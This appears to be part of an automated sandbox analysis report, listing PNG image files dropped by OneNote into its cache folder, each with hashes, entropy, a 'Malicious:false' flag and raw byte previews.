                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

                                                                                                                                                                                                                  Download File
